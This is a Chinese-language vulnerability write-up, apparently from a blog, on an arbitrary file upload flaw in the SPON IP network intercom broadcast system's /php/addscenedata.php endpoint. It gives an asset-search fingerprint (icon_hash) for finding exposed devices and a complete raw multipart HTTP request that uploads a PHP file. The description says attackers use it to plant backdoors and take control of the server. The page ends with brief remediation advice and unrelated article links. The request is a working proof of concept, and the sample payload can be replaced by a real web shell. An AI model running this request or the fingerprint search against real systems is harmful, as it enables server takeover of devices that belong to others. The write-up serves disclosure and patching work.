世邦通信 SPON IP网络对讲广播系统addscenedata.php任意文件上传漏洞

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/addscenedata.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4LuoBRpTiVBo9cIQ
Accept-Encoding: gzip

------WebKitFormBoundary4LuoBRpTiVBo9cIQ
Content-Disposition: form-data; name="upload"; filename="7788.php"
Content-Type: application/octet-stream

<?php echo 'ok';?>
------WebKitFormBoundary4LuoBRpTiVBo9cIQ--

访问上传文件地址

修复建议

1、升级到安全版本

2、如非必要,禁止公网访问该系统。

3、设置白名单访问。

相关推荐
dbdr09013 分钟前
Linux 入门到精通,真的不用背命令!零基础小白靠「场景化学习法」,3 个月拿下运维 offer,第二十六天
linux·运维·服务器·网络·python·学习
喜葵10 分钟前
前端安全防护深度实践:从XSS到供应链攻击的全面防御
前端·安全·xss
泰迪智能科技1 小时前
案例分享|企微智能会话风控系统:为尚丰盈铝业筑牢沟通安全防线
安全·企业微信
日更嵌入式的打工仔2 小时前
PHY的自适应协商简析
网络·嵌入式硬件·自适应·phy
lingggggaaaa3 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
XXYBMOOO3 小时前
Qt UDP 通信类详解与实现
开发语言·网络·c++·qt·网络协议·ui·udp
Jayyih3 小时前
嵌入式系统学习Day29(tcp)
网络·学习·tcp/ip
dog2503 小时前
乐观并发: TCP 与编程实践
网络·网络协议·tcp/ip
MoloXuanhe3 小时前
[TryHackMe]Wordpress: CVE-2021-29447(wp漏洞利用-SSRF+WpGetShell)
运维·网络·安全·tryhackme·thm
wanhengidc4 小时前
网页版的云手机都有哪些优势?
运维·网络·安全·游戏·智能手机